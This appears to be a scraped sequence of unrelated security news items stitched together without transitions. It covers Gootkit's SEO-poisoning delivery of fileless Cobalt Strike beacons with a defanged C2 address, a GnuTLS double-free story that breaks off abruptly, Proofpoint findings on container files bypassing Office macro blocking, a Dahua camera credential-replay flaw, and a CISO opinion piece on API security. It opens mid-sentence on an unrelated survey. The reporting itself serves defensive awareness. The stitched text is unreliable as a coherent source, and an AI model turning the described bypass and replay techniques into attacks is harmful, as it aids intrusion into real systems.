The report also reveals a disconnect when it comes to reporting security risks. Eighty percent of security leaders believe robust feedback loops are in place to report incidents, but less than half of employees feel the same, suggesting clearer processes are needed so that security teams have greater visibility of risk in their organization.
Gootkit access-as-a-service (AaaS) malware is back with tactics and fileless delivery of Cobalt Strike beacons.
Gootkit runs on an access-a-as-a-service model, it is used by different groups to drop additional malicious payloads on the compromised systems. Gootkit has been known to use fileless techniques to deliver threats such as the SunCrypt, and REvil (Sodinokibi) ransomware, Kronos trojans, and Cobalt Strike.
In the past, Gootkit distributed malware masquerading as freeware installers, now it uses legal documents to trick users into downloading these files.
The attack chain starts with a user searching for specific information in a search engine. Attackers use black SEO technique to display a website compromised by Gootkit operators among the results.
Upon visiting the website, the victim will notice that it is presented as an online forum directly answering his query. This forum hosted a ZIP archive that contains the malicious .js file, which is used to establish persistence and drop a Cobalt Strike binary in the memory of the infected system.
“When the user downloaded and opened this file, it spawned an obfuscated script which, through registry stuffing, installed a chunk of encrypted codes in the registry and added scheduled tasks for persistence. The encrypted code in the registry was then reflectively loaded through PowerShell to reconstruct a Cobalt Strike binary that runs directly in the memory filelessly.” reads the analysis published by Trend Micro. “Much of what we have just described is still in line with the behavior we reported in 2020, but with a few minor updates. This indicates that Gootkit Loader is still actively being developed and has proved successful in compromising unsuspecting victims.”
Experts pointed out that encrypted registries now use custom text replacement algorithm instead of base64 encoding.
The Cobalt Strike binary loaded directly to the memory of the victim’s system has been observed connecting to the IP address 89[.]238[.]185[.]13, which is a Cobalt Strike C2.
“One key takeaway from this case is that Gootkit is still active and improving its techniques. This implies that this operation has proven effective, as other threat actors seem to continue using it. Users are likely to encounter Gootkit in other campaigns in the future, and it is likely that it will use new means of trapping victims.” concludes the report. “This threat also shows that SEO poisoning remains an effective tactic in luring unsuspecting users. The combination of SEO poisoning and compromised legitimate websites can mask indicators of malicious activity that would usually keep users on their guard. Such tactics highlight the importance of user awareness and the responsibility of website owners in keeping their cyberspaces safe.”Â
The best-known cryptographic library in the open-source world is almost certainly OpenSSL.
Firstly, it’s one of the most widely-used, to the point that most developers on most platforms have heard of it even if they haven’t used it directly.
Secondly, it’s probably the most widely-publicised, sadly because of a rather nasty bug known as Heartbleed that was discovered more than eight years ago.
Despite being patched promptly (and despite reliable workarounds existing for developers who couldn’t or wouldn’t update their vulnerable OpenSSL versions quickly), Heartbleed remains a sort of “showcase” bug, not least because it was one of the first bugs to be turned into an aggressive PR vehicle by its discoverers.
With an impressive name, a logo all of its own, and a dedicated website, Heartbleed quickly became a global cybersecurity superstory, and, for better or worse, became inextricably linked with mentions of the name OpenSSL, as though the danger of the bug lived on even after it had been excised from the code.
Life beyond OpenSSL
But there are several other open-source cryptographic libraries that are widely used as well as or instead of OpenSSL, notably including Mozilla’s NSS (short for Network Security Services) and the GNU project’s GnuTLS library.
As it happens, GnuTLS just patched a bug known as CVE-2022-2509, reported in the project’s security advisory GNUTLS-SA-2022-07-07.
This patch fixes a memory mismanagement error known as a double-free.
Microsoft’s announcement that it would block macros in Microsoft Office apps by default didn’t stop threat actors—they have simply resorted to new tricks.
“Threat actors across the landscape responded by shifting away from macro-based threats,” Proofpoint researchers noted in a blog post. In fact, an analysis of campaign data, “which include threats manually analyzed and contextualized,” showed the use of VBA and XL4 Macros ticked down 66% or so between October 2021 and June 2022.
“While Proofpoint observed a notable increase in other attachment types, macro-enabled documents are still used across the threat landscape,” the researchers wrote, explaining that the tactics, techniques and procedures (TTPs) have changed, with miscreants turning to use of container files—like ISO and RAR—and Windows Shortcut files to pass malware along, according to Proofpoint research.
Threat actors have long used VBA macros “to automatically run malicious content when a user has actively enabled macros in Office applications. XL4 macros are specific to the Excel application, but can also be weaponized by threat actors,” researchers pointed out. “Typically, threat actors distributing macro-enabled documents rely on social engineering to convince a recipient the content is important, and enabling macros is necessary to view it.”
Microsoft took steps to block VBA macros by keying on a Mark of the Web (MOTW) attribute called the Zone.Identifier that shows whether a file comes from the internet and is added by Microsoft apps to some documents downloaded from the web. But bad actors can bypass MOTW by using container file formats.
By using container file formats like ISO (.iso), RAR (.rar), ZIP (.zip) and IMG (.img) files to send macro-enabled documents, “ … the ISO, RAR, etc. files will have the MOTW attribute because they were downloaded from the internet, but the document inside, such as a macro-enabled spreadsheet, will not,” researchers noted. “When the document is extracted, the user will still have to enable macros for the malicious code to automatically execute, but the file system will not identify the document as coming from the web.”
They also can distribute payloads directly using container files so that when they’re opened they can contain “additional content such as LNKs, DLLs or executable (.exe) files that lead to the installation of a malicious payload.”
“The change to block macros by default is a very good thing; has been suggested for years and it’s good Microsoft is finally doing it,” said Rob Jenks, SVP strategy and business at Tanium. He explained that “as with all security techniques, it’s not a silver bullet and attackers inevitably move on to the next attack pathway(s)—so the findings aren’t surprising.”
But “regarding the new attacks, there are other restrictions on not trusting zip content, so these other mechanisms throw more consent dialogs into the user’s face, potentially making a phishing attack less reliable,” Jenks said.
Proofpoint researchers have not only noted a two-thirds decrease in macro-enabled documents leveraged as attachments in email-based threats, but they observed “the number of campaigns leveraging container files including ISO and RAR, and Windows Shortcut (LNK) attachments increased nearly 175%,” researchers said.
“They attribute the increase in part to the uptick in use of ISO and LNK files in campaigns. Cybercriminal threat actors are increasingly adopting these as initial access mechanisms, such as actors distributing Bumblebee malware,” they said. “The use of ISO files increased over 150% between October 2021 and June 2022. More than half of the 15 tracked threat actors that used ISO files in this time began using them in campaigns after January 2022.”
Most notably, LNK files have emerged as a go-to for threat actors—at least 10 of them have begun using LNK files since February.  In fact, the number of campaigns containing LNK files exploded an incredible 1,675% since October 2021.
While fewer campaigns are using XL4 macros, Proofpoint did see a spike in macro use in March 2022, which researchers attributed to an uptick in campaigns with higher volumes of messages conducted by the TA542 actor delivering Emotet. “Typically, TA542 uses Microsoft Excel or Word documents containing VBA or XL4 macros,” the researcher wrote. “Emotet activity subsequently dropped off in April and it began using additional delivery methods including Excel Add-In (XLL) files and zipped LNK attachments in subsequent campaigns.”
The adoption of ISO and other container file formats is driving the pivot away from macro-enabled documents to different file types that can bypass the macro-blocking protections offered by Microsoft. “Such filetypes can bypass Microsoft’s macro blocking protections, as well as facilitate the distribution of executables that can lead to follow-on malware, data reconnaissance and theft and ransomware,” said Proofpoint researchers, who called the change “one of the largest email threat landscape shifts in recent history.”
Proofpoint has also observed a slight increase in threat actors using HTML attachments to deliver malware. The number of malware campaigns using HTML attachments more than doubled from October 2021 to June 2022, but the overall number remains low. Proofpoint researchers also observed threat actors increasingly adopt HTML smuggling, a technique used to “smuggle” an encoded malicious file within a specially crafted HTML attachment or web page.
A vulnerability, tracked as CVE-2022-30563, impacting Dahua IP Camera can allow attackers to seize control of IP cameras.
The CVE-2022-30563 vulnerability impacting Dahua IP Camera can allow attackers to seize control of IP cameras. The issue affects Dahua’s implementation of the Open Network Video Interface Forum (ONVIF).
ONVIF provides and promotes standardized interfaces for effective interoperability of IP-based physical security products.
The vulnerability was discovered by researchers from Nozomi Networks and received a CVSS score of 7.4.
“We’re publishing the details of a new vulnerability (tracked under CVE-2022-30563) affecting the implementation of the Open Network Video Interface Forum (ONVIF) WS-UsernameToken authentication mechanism in some IP cameras developed by Dahua, a very popular manufacturer of IP-based surveillance solutions.” reads the advisory published by Nozomi Networks. “This vulnerability could be abused by attackers to compromise network cameras by sniffing a previous unencrypted ONVIF interaction and replaying the credentials in a new request towards the camera.”
ONVIF-conformant products allow users to perform a variety of actions on the remote device through a set of standardized Application Programming Interfaces (APIs), including watching camera footage, locking or unlocking a smart door, and performing maintenance operations.
The flaw resides in the “WS-UsernameToken” authentication mechanism implemented by Dahua in some of its IP cameras. Due to the lack of checks to prevent reply attacks, a threat actor can sniff an unencrypted ONVIF interaction and indefinitely replay the credentials in new requests towards the camera, which would be accepted as valid authenticated requests by the device.
Once obtained the credentials, an attacker can add an administrator account and use it to obtain full access to the device and perform actions such as watching live footage from the camera as shown below.
An attacker can conduct this attack by capturing one unencrypted ONVIF request authenticated with the WS-UsernameToken schema.
The following versions of Dahua video products, are affected:
Dahua ASI7XXX: Versions prior to v1.000.0000009.0.R.220620
Dahua IPC-HDBW2XXX: Versions prior to v2.820.0000000.48.R.220614
Dahua IPC-HX2XXX: Versions Prior to v2.820.0000000.48.R.220614
The vendor addressed the issue with the release of a patch on June 28, 2022,
“In addition to building security, surveillance cameras are used throughout many critical infrastructure sectors such as oil & gas, power grids, telecommunications, etc. These cameras are used to oversee many production processes, providing remote visibility to process engineers. Threat actors, nation-state threat groups in particular, could be interested in hacking IP cameras to help gather intel on the equipment or production processes of the target company.” concludes Nozomi. “This information could aid in reconnaissance conducted prior to launching a cyberattack. With more knowledge of the target environment, threat actors could craft custom attacks that can physically disrupt production processes in critical infrastructure.”
A CISO’s mandate is to empower the business to move forward on key growth initiatives and simultaneously reduce risk. To this end, they must continuously evaluate and weigh the security ramifications of many strategic initiatives, ultimately weighing the potential impact on a company’s:
• Speed to market.
• Competitive advantage.
• Brand reputation.
By focusing on how their security infrastructure helps or hinders delivery on those three fronts, CISOs help drive business success. In today’s landscape, one new area has emerged that is integrally connected to all three of those company dynamics: the use of APIs to fuel innovation.
APIs are eating the world.
APIs are essential for companies to support their innovative and revenue-generating digital transformation initiatives. Open banking services, mobile and online services, digital information sharing apps, brands like DoorDash, Uber, PayPal, Spotify, Netflix, Tesla—you name it—all require APIs to function.
Companies are developing and pushing out APIs faster, and in larger quantities, than ever before. APIs allow companies to build and bring advanced services to market, opening up new avenues of business and revenue streams. Digitalization hastened this trend, and Covid accelerated its implementation. Companies had to quickly deploy remote services for workers and customers and build product integrations to support myriad devices—all of which demanded APIs. It’s no wonder that the public API hub Postman hit a record 20 million users earlier this year.
However, because APIs share highly sensitive data with customers, partners and employees, they have also become a very attractive target for attackers. CISOs have recognized the risk.
The faster a business can bring new services to market, the faster the benefits. For some companies (under Covid), speed to market meant the difference between keeping the business up and running versus shutting down operations. API usage ensured that organizations were open for business.
Businesses must always assess the value and the costs in terms of both achieving or losing the speed-to-market race. They must consider the obstacles that could prevent speed to market. In the case of APIs, security threats pose an enormous obstacle. They can slow down rollouts or, even worse, make them untenable.
By protecting APIs from exploitation, companies ensure their ability to drive speed to market, growth opportunities and competitive advantage.
APIs deliver a competitive advantage.
Speed to market is an important underlying factor that contributes to an organization’s competitive advantage. As an industry front runner, businesses have an opportunity to gain the lion’s share of a market and its profits.
In financial services, competitive advantage is a critical business objective, and technology transformation is its core strategic component. Fintech companies have fueled customer expectations, and open banking is right behind them, offering unimaginable innovation and conveniences by easily linking mobile apps to banking accounts.
Banking and financial institutions must stay on the cutting edge of these services to compete and stay relevant. APIs power these capabilities and allow institutions to leapfrog ahead of the competition.
However, security threats and lack of regulatory adherence can compromise successful API implementation and result in costly fines. Businesses must ensure safe passage between the emerging applications and customers’ valuable financial data. APIs represent the access point to PII and other important data assets that attackers target for their own gain and to the detriment of the business.
Dedicated API security is the cost of doing business.
The monetary growth opportunities promised by APIs are immense, but to harness them, CISOs must ensure the protection of their APIs. APIs support the interconnectivity of a company’s crown jewels—the essential and sensitive data that businesses require to deliver their digital goods and services.
Every company that is developing software has become an API-driven company. For API-driven companies, protecting those APIs is no longer a question—it’s simply the cost of doing business in a digitally transformed landscape. Without dedicated API security to protect these crucial connectivity tools, companies put everything at risk—speed to market, competitive advantage and the brand itself.
Last but not least, CISOs must build a collaborative approach to API security. APIs touch all areas of the business. CISOs need to take an active role in educating teams about their API security initiatives and their importance in reducing the company’s risks. CISOs must provide the answers and insights that empower others to help meet security goals.
CISO after CISO will tell you that creating a strong, cross-functional “security-aware” culture continues to be their number one priority. To generate this security mindset, leaders must prioritize relationships, acknowledge everyone’s contribution to security and continuously communicate the vital importance of security to achieve overall business objectives.
